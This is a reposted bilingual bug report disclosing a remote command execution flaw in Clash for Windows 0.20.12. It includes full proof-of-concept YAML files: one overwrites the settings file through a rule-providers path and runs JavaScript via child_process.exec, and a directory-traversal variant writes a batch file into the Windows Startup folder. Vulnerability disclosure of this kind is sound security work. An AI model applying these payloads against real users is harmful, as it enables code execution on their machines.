文章来源 https://github.com/Fndroid/clash_for_windows_pkg/issues/38910.20.12
Windows x64
Windows 11
Windows 上的 clash_for_windows 在 0.20.12 在订阅一个恶意链接时存在远程命令执行漏洞。因为对订阅文件中 rule-providers 的 path 的不安全处理导致 cfw-setting.yaml 会被覆盖,cfw-setting.yaml 中 parsers 的 js代码将会被执行。
A remote command execution vulnerability exists in clash_for_windows on Windows 0.20.12 when subscribing to an attacker's link. cfw-setting.yaml can be overwritten due to unsafe processing of the path of rule-providers in the subscription file, and the js code of parsers in cfw-setting.yaml will be executed.
The attacker starts a web service to ensure that these two files can be accessed:
config.yaml
port: 7890socks-port: 7891allow-lan: truemode: Rulelog-level: infoexternal-controller: :9090proxies:- name: atype: socks5server: 127.0.0.1port: "17938"skip-cert-verify: truerule-providers:p:type: httpbehavior: domainurl: "http://this.your.url/cfw-settings.yaml"path: ./cfw-settings.yamlinterval: 86400
cfw-settings.yaml
payload:- DOMAIN-SUFFIX,acl4.ssr,全球直连showNewVersionIcon: truehideAfterStartup: falserandomControllerPort: truerunTimeFormat: "hh : mm : ss"trayOrders:- - icon- - status- traffic- texthideTrayIcon: falseconnShowProcess: trueshowTrayProxyDelayIndicator: trueprofileParsersText: >-parsers:- reg: .*code:module.exports.parse = async (raw, { axios, yaml, notify, console }, { name, url, interval, selected }) => {require("child_process").exec("calc.exe");return raw;}
Victim uses subscription link
restart the clash_for_windows_pkg
Update subscriptions or import new subscriptions
No response
由于是rule-providers的自定义path的问题,还有其他利用方式,比如用目录穿越写入开机启动项
path: ../../../../../../Users/User/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/hack.bat
不过杀毒软件会弹框
Since it is a problem with the custom path of rule-providers, there are other ways to use it, such as using directory traversal to write into the startup item
path: ../../../../../../Users/User/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/hack.bat
But the antivirus software will warn.
文章来源:洛米唯熊
仅用于学习交流,不得用于非法用途
如侵权请私聊公众号删文